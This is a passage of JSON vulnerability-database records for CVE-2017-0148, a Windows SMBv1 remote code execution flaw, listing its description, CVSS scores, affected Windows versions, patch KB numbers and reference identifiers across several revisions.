"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T09:06:54", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", 